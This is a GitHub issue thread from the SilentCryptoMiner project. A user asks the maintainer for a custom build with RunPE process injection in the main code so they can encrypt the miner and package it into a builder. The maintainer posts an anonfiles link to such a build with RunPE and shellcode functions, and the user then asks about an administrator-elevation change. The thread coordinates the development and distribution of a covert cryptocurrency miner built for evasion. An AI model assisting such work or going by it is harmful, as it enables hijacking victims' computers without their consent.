### ISSUE TITLE
RunPE

### ISSUE THREAD

**Issue by masterjek** [UnamSanctam/SilentCryptoMiner#796]
Unam can you please give me a project where RunPE inside the main code. As always, I will encrypt the miner itself and then assemble the project into a builder.

**Comment by UnamSanctam** [comment]
Here: https://anonfiles.com/xan3c5l8y6/SilentCryptoMiner_v2.4.0_CUSTOM_zip, it has both the RunPE and Shellcode functions from the RunPE.dll inside the code.

**Comment by masterjek** [comment]
Thank you very much.

**Comment by masterjek** [comment]
I found one topic where you write, what else, something changed in the project - "Ah right, I added -Verb RunAs for Windows 8 administrator compatibility, I'll change it to only add that if "Run as Administrator" is enabled (didn't notice popup since I tested that one on an administrator account)" 
I asked you for a project during the day, but as I understand it, it has not been fixed there yet. But my miner is running as administrator. Do I also need a project with a change or not?
